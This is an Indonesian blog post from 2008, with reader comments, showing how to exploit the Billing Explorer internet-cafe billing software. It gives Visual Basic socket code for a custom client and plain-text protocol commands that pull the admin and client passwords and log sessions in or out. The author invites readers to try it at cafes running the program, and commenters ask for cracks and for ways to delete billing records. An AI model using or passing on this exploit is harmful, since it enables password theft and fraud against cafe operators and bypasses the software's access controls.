Memanfaatkan Kelemahan Billing Explorer, Sekedar informasi buat operator warnet

Memanfaatkan Kelemahan Billing Explorer, Sekedar informasi buat operator warnetSebelum masuk ke inti permasalahan, ada yang perlu anda persiapkan:
- Coba download program demo nya di www.billingexplorer.com
Server program dan client program
- Setelah berhasil mendownload ke duanya, silahkan anda install
terlebih dahulu.
- Apabila proses installasi selesai, silahkan anda coba jalankan kedua
program tersebut pada satu komputer.
- Jalankan program server terlebih dahulu kemudian program clientnya
- Secara default passwordnya akan berisi 008
- ok saya anggap anda semua udah bisa menjalankannya.

Nah apabila selesai proses diatas coba anda jalankan hanya program servernya saja. Kita akan liat kelemahan yang terjadi pada koneksinya.

Kalo kalian pake program packet snipper mungkin akan kelihatan, data apa saja yang dikirim ke client…….Setelah diamati beberapa menit dengan program packetsnipper ternyata setiap data yang dikirim ke client melalui winsock tidak terproteksi atau dalam kata lain hanya berupa plaintext saja…ops….ternyata….he…he…. :spiteful:

Okeh kita lanjut lagi, jika dilihat pada data yang dikirim oleh program server selalu diawali dengan ‘YYY’ dan sebaliknya apabila dikirim dari client ke server akan diawali dengan ‘XXX’ (tanpa curek).

(”Mungkin hal seperti ini akan berakibat fatal, ini bisa kita jadikan contoh bahwa data yang dikirim diusahakan harus terenkripsi untuk menghindari dan meminimalisasi pencurian data2 yang berbentuk plain text.”)

Ada beberapa perintah yang dikirim dari client ke server seperti:

XXX$personal$2$HIPERSEKS$

kalo saya gak salah artikan perintah diatas, menjadi spt ini:
XXX -> Perintah dari client
$ -> sebagai seperator atau pemisah parameter
personal -> type login yang digunakan user
$ -> sebagai seperator atau pemisah parameter
2 -> No PC Client yang telah di setting
$ -> sebagai seperator atau pemisah parameter
HIPERSEKS -> Nama yang digunakan oleh user

Maka kesimpulannya kita bisa login ke program server tanpa program client bawaanya dan kita bisa ganti dengan program kecil buatan sendiri.

Coba anda buat satu project dengan:
1 form, 1 winsock control, 2 commandbutton dan 2 textbox
untuk text1 rubah properti Multiline= True dengan Scrollbars=Both

Private Sub Command1_Click ()
SOCK.Close
‘// Masukan IPAddress Servernya dengan Port 1500 (default port)
SOCK.Connect “192.168.0.1″, “1500″
End Sub

Private Sub Command2_Click ()
If SOCK.State = sckConnected Then SOCK.SendData Text2.Text
End Sub

Private Sub SOCK_DataArrival( ByVal bytesTotal As Long )
Dim Data As String
SOCK.GetData Data
Text1.SelText = Data & vbCrLf & String (50, “-”) & vbCrLf
End Sub

setelah selesai koding diatas coba anda jalankan, lakukan koneksi keserver dengan menekan tombol command1. Apabila berhasil koneksi ke server coba anda tuliskan beberapa perintah dibawah ini pada textbox2 dan diakhiri dengan menekan tombol Command2.

Perintah:
XXX$passY$2$

perintah diatas digunakan untuk melihat password client dan password server pada PC Client No 2 (dua). hasil data yang dikirim dari server ke client dengan menyertakan perintah diatas akan terlihat seperti ini:

YYY$passY$008$Warnet Integral$JL. Prof.Bunyamin 667 Purwokerto 0281-642492$Email info_008@yahoo.com - http://www.billingexplorer.com$111

kalo dilihat pada kata ‘008′ dan ‘111′, ini dapat diartikan sebagai password Administrator dan Password PC Client.

kita bisa klik tombol admin pada program clientnya, dan masukan passwordnya.
anda bisa mencoba beberapa perintah dibawah ini:
1. XXX$personal$2$HIPERSEKS$
(Login pada PC no 2 dengan nama user HIPERSEKS)
2. XXX$stop$2$HIPERSEKS
(untuk logout dari billing)
3. XXX$con$2$HIPERSEKS
4. XXX$infod2$2$
5. XXX$ablock$2$
6. XXX$admin$2$Admin
7. XXX$tutup$2$$

Anda bisa cari lagi perintah2 yg lain dengan menggunakan packet snipper seperti ‘EtherDetect Packet Sniffer’.

Selain itu ada beberapa kelemahan lain yang terdapat pada program ini, seperti tidak diproteksinya file executable dengan program-program compress exe, spt UPX,PE-COMPAT ataupun yg lain. ini sangat memudahkan untuk di CRack.

Sekedar info, program yang saya coba adalah Billing-Explorer Ver 4.40 Grand R-14a. yang di compile dengan visual basic v 5.0

Jadi kalo jalan-jalan ke warnet dan kebetulan billing nya menggunakan program ini, hmmm.m.m..mmmm…sekalian bisa dicoba…nih….

Popularity: 2% [?]

categories hack | jadul | datetime February 7, 2008 2:45 am

20 Comments

  • By trex, April 12, 2008 @ 7:56 pm

    keren bos..
    tp qw masih bgg,nie sebenere buat operator ato buat user yah..???
    soale dsni qw sbagai salah satu op nih…:)

  • By jadul, April 13, 2008 @ 12:52 am

    ini buat user…
    kl buat operator ada tuh yang buat intip2 pass admin
    ke ke ke ke

  • By akunk, April 23, 2008 @ 11:06 pm

    kalau crack buat billing explorer nya ada yang tau ga yaa
    tolong kalau ada aku lagi butuh pengen nyoba buat 6 komputer
    billing explorernya udah dapat

  • By bhutheg, June 19, 2008 @ 4:41 am

    bos kenalin ak ni op di salah satu warnet. ada yang tau g gimana caranya buat tau pasword update data billing, yang bisa delet-delet gtu???? :) coz setiap aku jaga tombok terus nuh, gimana g rugi yahhhh. tolong dunk kasih tau nama softwarenya kirim aja ke “black_bhutheg@yahoo.com” thanks ya buat yang mau kasih tau

  • By RIAN, June 24, 2008 @ 11:24 pm

    w nk bekasi w gawe sebagai opr tapi w masih ingin jadi hecker aja
    karna tujuan w di warmet hanya untuk belajar jadi hecking
    ada yang bisa jawab w ga
    tulong sapa aja yang ngeliat bantu w ya

  • By jadul, June 25, 2008 @ 6:12 pm

    @akunk
    ada ada dicari2 lagi gih ada ko

    @bhutheg
    ada ada kirim imel ke jadul@jadul.com

    @RIAN
    mau jadi ceker? ada tuh tutornya di jadul.com
    cari2 aja banyak ko

  • By wawan_tms, July 18, 2008 @ 12:45 am

    Gwe punya program untuk hack billing explorer….yg mau hubungi gwe email or YM wawan_tms@yahoo.co.id

  • By jadul, July 18, 2008 @ 9:00 am

    coba dikirim ke sini mas. biar bisa di share
    kl di share kan jadinya para OP bisa melakukan block terhadap program tersebut

  • By lola, August 5, 2008 @ 1:18 am

    boss\
    aq salah saytu pekerja di salah satu warnet di kota kecil>>tulungagung

    kemaren tuh ngk tahu kenapa
    si boss aq,nerima pegawai yang juahatnya…

    minta ampun!!

    selain dia sok hacker jahil gitu.
    sebelum di keluar dari
    warnet tempat aq bekerja dia menanam virus,yang mm bikijn
    “lelet aktivasi,pkkok nya lelet-nya pouooooolll>>

    sampae2 si bos aq puyeng
    aq kasihan bget
    padahal kita pkk 3spedy yang di gunakan di 18 computer sulusinya gimna nich
    untuk ndetek tu virus>>pkk apa anti virusnya?
    >>trus gimana agar kembali norml??
    >>apa harus di instal ulang??

  • By jadul, August 5, 2008 @ 3:00 pm

    Ghost ulang aja. Pake acronis cukup gampang ko.
    Sebelum Install pasang kaspersky. Atau antivirus.

  • By aris, September 2, 2008 @ 11:24 pm

    mau nanya, kalau di pakai deep freeze di computer clientnya billingnya bisa masuk tapi bacaan nya hilang, kecuali diklik lagi icon billing clientnya baru nongol, gmn cara ngatasinya,,,,….

  • By jadul, September 3, 2008 @ 2:55 pm

    emang billing crash sama deepfrezz
    tapi dicoba aja. kalau mau pake software laen selain deepfreez. banyak ko disana:sip:

  • By kodox, September 19, 2008 @ 11:05 am

    ini kreaktif sndiri apa cma copy paste milik orang lain…..??????????:melet::melet:

  • By samosir, October 8, 2008 @ 4:51 pm

    sekuen perintah sudah berubah untuk versi terbaru.
    triknya ada disini http://u-0u3afnkb1.urlcash.net

  • By yopi, October 12, 2008 @ 9:02 pm

    kancuuuuuuuuuuuuuuutttttt………..

    bikin rugi warnet ja…

    hahahhahahaaaa

  • By budiman, October 18, 2008 @ 3:15 pm

    aq klo masuk ym kok selalu muncul windows Explore scrif error truss dan kadang2 muncul minta cd office yg kita intal gimana caranya hilangkan hal tersebut yh
    tolong yg tau thnk .

  • By amar, October 26, 2008 @ 11:33 pm

    billing nya fersi apa sich, o ya satu lagi bisa ga ajari aku buat blog di wordprees..sampe skrang blon bisa tuh..edit2 na..
    help me pleace…hihih :-j

  • By MiNaNk, November 5, 2008 @ 7:55 pm

    tolongi duNk,Aq Niwbi di dunia operator Warnet..
    Ngatasi LeMotNya Speedy GiMana??
    ThaNks All

  • By Mr. Berwajah tanpan, November 19, 2008 @ 6:29 pm

    ya lu tlp aja 147
    trus klo orang speedy dateng, trus lu getok aja palanya pake mouse…..

    gitu aja ko repor……

  • By dudulz, November 21, 2008 @ 11:41 am

    boss, saya user. Ada cara gak biar apa yg qt buka atau donlot di browser gak ketahuan op?
    makasih.

Other Links to this Post

RSS feed for comments on this post. TrackBack URI

Leave a comment

:diem2: :bingung: :mataduit: :terkapar: :puyeng2: :diem2: :digetok: :serem: more »


Comments links could be nofollow free.

WordPress Theme Design